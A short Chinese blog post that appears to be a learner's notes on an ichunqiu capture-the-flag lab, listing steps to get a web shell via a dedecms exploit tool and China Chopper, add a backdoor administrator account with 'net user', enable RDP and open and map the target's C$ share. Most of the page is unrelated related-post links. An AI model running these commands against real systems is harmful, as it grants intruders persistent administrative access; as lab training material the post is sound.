ichunqiu《真的很简单》实验的几个坑点

作者: Ign0re | 来源:发表于2016-10-05 23:23 被阅读0次

ichunqiu《真的很简单》实验的几个坑点
Struts2 048实验
Joomla未授权创建用户漏洞分析与防御（CVE-2016-88
ichunqiu web
GameCenter登录坑点总结
首坑
几个实验
Scratch挖坑系列/王者荣耀1v1制作/（一）
生活点滴（267）
沉舟侧畔

用了一下午做了下这个实验

各种百度无果作为一枚资深菜鸟觉得没有一个完整的教程是活不下去的好嘛 .. 被整的死去活来QAQ.

本次实验要求获取www.test.ichunqiu网站的FLAG信息

第一个《我很简单》：参考独狼的攻略

1.getshell
通过dedecms漏洞利用工具下载，链接 tools.ichunqiu.com
之后去掉前3后1 去解md5

2.菜刀上传 pr,cmd,net,net1
3.net user hack 123 /add
net localgroup administrators hack /add
3389
4.net user hack //验证是否成功加上
5.in target host>>
net share ipc$ //打开ipc共享
net share c$=c: //打开c盘共享
6.in loacl host>>
net use h: \172.16.12.2\c$ "123" /user:"hack"

net use 查看连接情况
net share 查看建立的IPC的连接

ps：时间太紧明天开课了作业还没写先这样 ..

ichunqiu《真的很简单》实验的几个坑点
用了一下午做了下这个实验各种百度无果作为一枚资深菜鸟觉得没有一个完整的教程是活不下去的好嘛 .. 被整的死...
Struts2 048实验
Struts2 048实验参考： https://www.ichunqiu.com/course/58753 使...
Joomla未授权创建用户漏洞分析与防御（CVE-2016-88
实验环境操作机：Windows XP目标机：Windows 2003目标地址：www.test.ichunqiu...
ichunqiu web
最近开始攻防世界跟ichunqiu的双重刷题。。。菜鸟感觉到两个平台的题目比起原来刷题的cg-ctf跟bugkuC...
GameCenter登录坑点总结
之前接入了GameCenter登录，发现了我遇到的几个坑点，总结一下:代码调用很简单。但是当我们调用下面代码进行呼...
首坑
昨天写demo遇到几个坑，我回忆一下。这几个坑我已经遇到好多次，但每次都重犯。有些真的不是很难，介需要细心。 tr...
几个实验
看似厨余垃圾，实际混入有餐厨，实际含油还是不少的。不加水看来是不行了，加了水不同絮凝剂用量，差别也还挺大。
Scratch挖坑系列/王者荣耀1v1制作/（一）
挖坑计划常常有人觉得Scratch只能做很简单的程序，不过是几个积木堆来堆去没什么学习价值。今天我们就开来个坑，...
生活点滴（267）
尽量地成长，尽量地经历，让人生美好一点，真的很简单。人生美好一点，真的很简单。 1 醒来看看时间，快六点，想想是起...
沉舟侧畔
我可能是无病呻吟了，但是今天我突然想，我是不是真的就这样了，该糜烂了。今天的实验课，又没有做出来，很简单的实验，...